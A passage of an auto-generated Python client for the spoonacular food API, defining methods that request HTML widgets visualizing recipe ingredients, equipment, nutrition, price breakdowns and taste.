# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeEquipment', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_ingredients(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Ingredients # noqa: E501
Visualize ingredients of a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_ingredients(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param str measure: The original system of measurement, either \\\"metric\\\" or \\\"us\\\".
:param str view: How to visualize the ingredients, either \\\"grid\\\" or \\\"list\\\".
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_ingredients_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
else:
(data) = self.visualize_ingredients_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
return data
def visualize_ingredients_with_http_info(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Ingredients # noqa: E501
Visualize ingredients of a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_ingredients_with_http_info(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param str measure: The original system of measurement, either \\\"metric\\\" or \\\"us\\\".
:param str view: How to visualize the ingredients, either \\\"grid\\\" or \\\"list\\\".
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_list', 'servings', 'measure', 'view', 'default_css', 'show_backlink'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_ingredients" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_ingredients`") # noqa: E501
# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `visualize_ingredients`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'measure' in local_var_params:
form_params.append(('measure', local_var_params['measure'])) # noqa: E501
if 'view' in local_var_params:
form_params.append(('view', local_var_params['view'])) # noqa: E501
if 'default_css' in local_var_params:
form_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
if 'show_backlink' in local_var_params:
form_params.append(('showBacklink', local_var_params['show_backlink'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeIngredients', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_menu_item_nutrition_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Menu Item Nutrition by ID # noqa: E501
Visualize a menu item's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_menu_item_nutrition_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The menu item id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_menu_item_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_menu_item_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_menu_item_nutrition_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Menu Item Nutrition by ID # noqa: E501
Visualize a menu item's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_menu_item_nutrition_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The menu item id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_menu_item_nutrition_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_menu_item_nutrition_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/menuItems/{id}/nutritionWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_price_breakdown(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Price Breakdown # noqa: E501
Visualize the price breakdown of a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_price_breakdown(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param float mode: The mode in which the widget should be delivered. 1 = separate views (compact), 2 = all in one view (full).
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_price_breakdown_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
else:
(data) = self.visualize_price_breakdown_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
return data
def visualize_price_breakdown_with_http_info(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Price Breakdown # noqa: E501
Visualize the price breakdown of a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_price_breakdown_with_http_info(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param float mode: The mode in which the widget should be delivered. 1 = separate views (compact), 2 = all in one view (full).
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_list', 'servings', 'mode', 'default_css', 'show_backlink'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_price_breakdown" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_price_breakdown`") # noqa: E501
# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `visualize_price_breakdown`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'mode' in local_var_params:
form_params.append(('mode', local_var_params['mode'])) # noqa: E501
if 'default_css' in local_var_params:
form_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
if 'show_backlink' in local_var_params:
form_params.append(('showBacklink', local_var_params['show_backlink'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizePriceEstimator', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_product_nutrition_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Product Nutrition by ID # noqa: E501
Visualize a product's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_product_nutrition_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the product. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_product_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_product_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_product_nutrition_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Product Nutrition by ID # noqa: E501
Visualize a product's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_product_nutrition_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the product. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_product_nutrition_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_product_nutrition_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/{id}/nutritionWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_equipment_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Equipment by ID # noqa: E501
Visualize a recipe's equipment list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_equipment_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_equipment_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_equipment_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_recipe_equipment_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Equipment by ID # noqa: E501
Visualize a recipe's equipment list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_equipment_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_equipment_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_equipment_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/equipmentWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_ingredients_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Ingredients by ID # noqa: E501
Visualize a recipe's ingredient list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_ingredients_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_ingredients_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_ingredients_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_recipe_ingredients_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Ingredients by ID # noqa: E501
Visualize a recipe's ingredient list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_ingredients_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_ingredients_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_ingredients_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/ingredientWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_nutrition(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Recipe Nutrition # noqa: E501
Visualize a recipe's nutritional information as HTML including CSS. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_nutrition(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_nutrition_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_nutrition_with_http_info(ingredient_list, servings, **kwargs) # noqa: E501
return data
def visualize_recipe_nutrition_with_http_info(self, ingredient_list, servings, **kwargs): # noqa: E501
"""Visualize Recipe Nutrition # noqa: E501
Visualize a recipe's nutritional information as HTML including CSS. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_nutrition_with_http_info(ingredient_list, servings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:param float servings: The number of servings. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_list', 'servings', 'default_css', 'show_backlink'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_nutrition" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_list' is set
if ('ingredient_list' not in local_var_params or
local_var_params['ingredient_list'] is None):
raise ApiValueError("Missing the required parameter `ingredient_list` when calling `visualize_recipe_nutrition`") # noqa: E501
# verify the required parameter 'servings' is set
if ('servings' not in local_var_params or
local_var_params['servings'] is None):
raise ApiValueError("Missing the required parameter `servings` when calling `visualize_recipe_nutrition`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'ingredient_list' in local_var_params:
form_params.append(('ingredientList', local_var_params['ingredient_list'])) # noqa: E501
if 'servings' in local_var_params:
form_params.append(('servings', local_var_params['servings'])) # noqa: E501
if 'default_css' in local_var_params:
form_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
if 'show_backlink' in local_var_params:
form_params.append(('showBacklink', local_var_params['show_backlink'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/visualizeNutrition', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_nutrition_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Nutrition by ID # noqa: E501
Visualize a recipe's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_nutrition_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_nutrition_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_recipe_nutrition_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Nutrition by ID # noqa: E501
Visualize a recipe's nutritional information as HTML including CSS. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_nutrition_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_nutrition_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_nutrition_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/nutritionWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_price_breakdown_by_id(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Price Breakdown by ID # noqa: E501
Visualize a recipe's price breakdown. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_price_breakdown_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_price_breakdown_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_price_breakdown_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def visualize_recipe_price_breakdown_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Visualize Recipe Price Breakdown by ID # noqa: E501
Visualize a recipe's price breakdown. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_price_breakdown_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool default_css: Whether the default CSS should be added to the response.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'default_css'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_recipe_price_breakdown_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `visualize_recipe_price_breakdown_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'default_css' in local_var_params:
query_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/priceBreakdownWidget', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_recipe_taste(self, ingredient_list, **kwargs): # noqa: E501
"""Visualize Recipe Taste # noqa: E501
Visualize a recipe's taste information as HTML including CSS. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_taste(ingredient_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_recipe_taste_with_http_info(ingredient_list, **kwargs) # noqa: E501
else:
(data) = self.visualize_recipe_taste_with_http_info(ingredient_list, **kwargs) # noqa: E501
return data
def visualize_recipe_taste_with_http_info(self, ingredient_list, **kwargs): # noqa: E501
"""Visualize Recipe Taste # noqa: E501
Visualize a recipe's taste information as HTML including CSS. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_recipe_taste_with_http_info(ingredient_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_list: The ingredient list of the recipe, one ingredient per line. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_list'] # noqa: E501
all_params.append('async_req')
